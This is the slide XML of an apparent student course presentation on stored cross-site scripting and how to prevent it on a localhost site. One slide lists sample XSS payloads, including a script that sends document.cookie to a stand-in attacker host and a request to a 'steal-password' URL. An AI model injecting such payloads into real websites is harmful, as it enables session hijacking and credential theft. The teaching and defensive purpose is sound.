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Lst>
  <p:sldSz cx="18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Sifonn"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League Spartan" charset="1" panose="000008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223C"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 2" id="2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10557035" y="0"/>
            <a:ext cx="7730965" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10307953" cy="13716000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 3" id="3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="28863" t="0" r="28863" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="10307953" cy="13716000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 4" id="4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="3707763" y="253455"/>
            <a:ext cx="2888820" cy="2825190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1278786" y="3502932"/>
            <a:ext cx="7746774" cy="863573"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Cyber Security (EE1219)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="615865" y="4747504"/>
            <a:ext cx="9397469" cy="2336084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6279"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>Stored Cross-site Scripting Attack and its prevention in Localhost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6279"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>Web Platform</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="615865" y="7977248"/>
            <a:ext cx="3514102" cy="1206501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4899"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3499">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Submitted To:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4899"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Devika Kataria</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4762003" y="7977248"/>
            <a:ext cx="5582002" cy="1788741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4899"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3499">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Submitted By:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>K. Bhanu Prakash Reddy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Sakshi Kashyap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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1507822" y="2930539"/>
            <a:ext cx="14893360" cy="5740478"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13775768" cy="5309714"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="13775768" cy="5309715"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="5309715" w="13775768">
                  <a:moveTo>
                    <a:pt x="13651308" y="5309714"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="5309714"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="5309714"/>
                    <a:pt x="0" y="5253834"/>
                    <a:pt x="0" y="5185254"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13651308" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13719888" y="0"/>
                    <a:pt x="13775768" y="55880"/>
                    <a:pt x="13775768" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13775768" y="5185254"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13775768" y="5253834"/>
                    <a:pt x="13719888" y="5309715"/>
                    <a:pt x="13651308" y="5309715"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="62745"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1291253" y="1009650"/>
            <a:ext cx="14893360" cy="1238223"/>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Sample Attack Scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1749602" y="3227556"/>
            <a:ext cx="13976663" cy="5079769"/>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DE59"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert('XSS attack!');&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="777240" indent="-388620" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5040"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>&lt;img src="javascript:alert('XSS attack!');" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="777240" indent="-388620" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5040"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>&lt;iframe src="http://malicious-site.com"&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="777240" indent="-388620" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5040"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>&lt;script&gt;window.location.href="http://attacker-site.com?cookie=" + document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="777240" indent="-388620" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5040"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>&lt;img src="http://attacker-site.com/steal-password.php" onerror="this.style.display='none';"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="777240" indent="-388620" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5040"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>&lt;iframe src="javascript:alert('XSS attack!');" /&gt;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1" r="0" b="331"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2986949" y="3838016"/>
            <a:ext cx="12371252" cy="2911623"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9234890" cy="2173468"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9234891" cy="2173468"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2173468" w="9234891">
                  <a:moveTo>
                    <a:pt x="9110431" y="2173468"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="2173468"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="2173468"/>
                    <a:pt x="0" y="2117588"/>
                    <a:pt x="0" y="2049008"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9110431" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9179010" y="0"/>
                    <a:pt x="9234891" y="55880"/>
                    <a:pt x="9234891" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9234891" y="2049008"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9234891" y="2117588"/>
                    <a:pt x="9179010" y="2173468"/>
                    <a:pt x="9110431" y="2173468"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2163134" y="4144531"/>
            <a:ext cx="13961731" cy="2174769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8749"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6249">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Stored Cross-site Scripting Prevention Techniques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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="791577" y="3283782"/>
            <a:ext cx="7650316" cy="5974518"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5923246" cy="4625762"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="5923247" cy="4625762"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="4625762" w="5923247">
                  <a:moveTo>
                    <a:pt x="5798786" y="4625761"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="4625761"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="4625761"/>
                    <a:pt x="0" y="4569882"/>
                    <a:pt x="0" y="4501302"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5798786" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5867366" y="0"/>
                    <a:pt x="5923247" y="55880"/>
                    <a:pt x="5923247" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5923247" y="4501302"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5923247" y="4569882"/>
                    <a:pt x="5867366" y="4625762"/>
                    <a:pt x="5798786" y="4625762"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="56863"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9144000" y="3283782"/>
            <a:ext cx="8438411" cy="5974518"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6533427" cy="4625762"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="6533428" cy="4625762"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="4625762" w="6533428">
                  <a:moveTo>
                    <a:pt x="6408967" y="4625761"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="4625761"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="4625761"/>
                    <a:pt x="0" y="4569882"/>
                    <a:pt x="0" y="4501302"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6408967" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6477547" y="0"/>
                    <a:pt x="6533428" y="55880"/>
                    <a:pt x="6533428" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6533428" y="4501302"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6533428" y="4569882"/>
                    <a:pt x="6477547" y="4625762"/>
                    <a:pt x="6408967" y="4625762"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="65882"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 7" id="7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9333634" y="4761434"/>
            <a:ext cx="8059142" cy="3821301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 8" id="8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="0" t="0" r="34644" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1028700" y="4761434"/>
            <a:ext cx="7047405" cy="2220074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 9" id="9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="51464" t="0" r="0" b="37800"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1935582" y="6981508"/>
            <a:ext cx="5233640" cy="1380870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2659484" y="682787"/>
            <a:ext cx="14077601" cy="1238223"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>Prevention Techinques used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2659484" y="3624072"/>
            <a:ext cx="3587434" cy="761975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6299"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4499">
                <a:solidFill>
                  <a:srgbClr val="FFD659"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10955505" y="3624072"/>
            <a:ext cx="4815401" cy="761975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6299"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4499">
                <a:solidFill>
                  <a:srgbClr val="FFCC59"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Input Validation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623950" y="1995346"/>
            <a:ext cx="11040101" cy="6296307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1465220" y="692312"/>
            <a:ext cx="15357559" cy="1114425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="8760"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7300" spc="-146">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn"/>
              </a:rPr>
              <a:t>Stored XSS website Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="8591958"/>
            <a:ext cx="15794080" cy="1223237"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13563484" cy="1050479"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="13563484" cy="1050479"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1050479" w="13563484">
                  <a:moveTo>
                    <a:pt x="13439023" y="1050479"/>
                  </a:moveTo>
